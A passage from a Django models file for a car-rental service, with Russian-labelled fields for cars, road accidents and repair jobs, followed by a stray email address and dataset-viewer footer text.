        ('Mazda', 'Mazda'),
        ('Mercedec-Benz', 'Mercedec-Benz'),
        ('Mitsubishi', 'Mitsubishi'),
        ('Nissan', 'Nissan'),
        ('Opel', 'Opel'),
        ('Peugeot', 'Peugeot'),
        ('Range Rover', 'Range Rover'),
        ('Renault', 'Renault'),
        ('Skoda', 'Skoda'),
        ('Toyota', 'Toyota'),
        ('Volkswagen', 'Volkswagen'),
        ('Volvo', 'Volvo'),
    )
    PLACES=(
        ('2', '2'),
        ('4', '4'),
        ('5', '5'),
        ('7', '7'),
    )
    brand = models.CharField('Марка', max_length=50, choices=BRAND)
    model = models.CharField('Модель', max_length=50)
    body_type = models.CharField('Тип кузова', max_length=50, choices=BODY_TYPE)
    # License plate; uniqueness prevents duplicate cars.
    number = models.CharField('Номер', max_length=5, unique=True)
    date_of_issue = models.DateField('Дата выпуска')
    color = models.CharField('Цвет', max_length=50, choices=COLOR)
    # NOTE(review): max_length has no effect on FloatField — presumably
    # copy-pasted from the CharFields; confirm it can be removed.
    engine = models.FloatField('Объём двигателя (л.)', max_length=50, validators=[validate_even])
    transmission = models.CharField('Тип КП', max_length=50, choices=TRANSMISSION)
    consumption_per_100 = models.FloatField('Расход (на 100 км.)', max_length=50, validators=[validate_even])
    price_per_day = models.DecimalField('Цена в день (Br)', max_digits=18, decimal_places=2, validators=[validate_even])
    # True while the car is available for rent.
    condition = models.BooleanField('Доступна', default=True)
    reserve = models.CharField('Запас хода (км.)', max_length=5)
    places = models.CharField('Места', max_length=2, choices=PLACES)
    capacity = models.CharField('Багажник (л.)', max_length=5)
    fuel = models.CharField('Топливо', max_length=50, choices=FUEL_TYPE)
    power = models.CharField('Мощность (л.с.)', max_length=4)
    foto = models.ImageField('Фото', upload_to='catalog/')
    # def __str__(self):
    #     template = '{0.id} {0.brand} {0.model}'
    #return template.format(self)
    def get_absolute_url(self):
        # Detail-page URL; 'carsingle' is a named route in urls.py.
        return reverse('carsingle',
                       args=[self.id])
    def __str__(self):
        return '{}, {}, {}'.format(self.id, self.brand, self.number)
class Road_Accident(models.Model):
    """A traffic accident involving one of the rental cars."""
    id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
    #id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
    #id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
    date_road_accident = models.DateField('Дата ДТП')
    defect = models.TextField('Повреждения')
    def __str__(self):
        return '{}'.format(self.id)
class Service(models.Model):
    """A repair job on a car, tied to the accident that caused it."""
    id_auto = models.ForeignKey(Auto, on_delete=models.CASCADE)
    id_road_accident = models.ForeignKey(Road_Accident, on_delete=models.CASCADE)
    date_of_start = models.DateTimeField('Дата начала ремонта')
    date_of_end = models.DateTimeField('Дата окончания ремонта')
    repair_description = models.TextField('Описание работ')

    def __str__(self):
        return '{}'.format(self.id)

    def save(self, *args, **kwargs):
        # Guard clause: refuse to persist an interval that ends at or before
        # its start.  ValidationError (imported at module level) is the
        # idiomatic Django error here and, being an Exception subclass,
        # stays backward compatible with callers catching Exception.
        if self.date_of_end <= self.date_of_start:
            raise ValidationError(
                "Время окончания ремонта не может быть раньше времени начала ремонта")
        super(Service, self).save(*args, **kwargs)
"maksimkushnerov@yandex.by"
] | maksimkushnerov@yandex.by |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.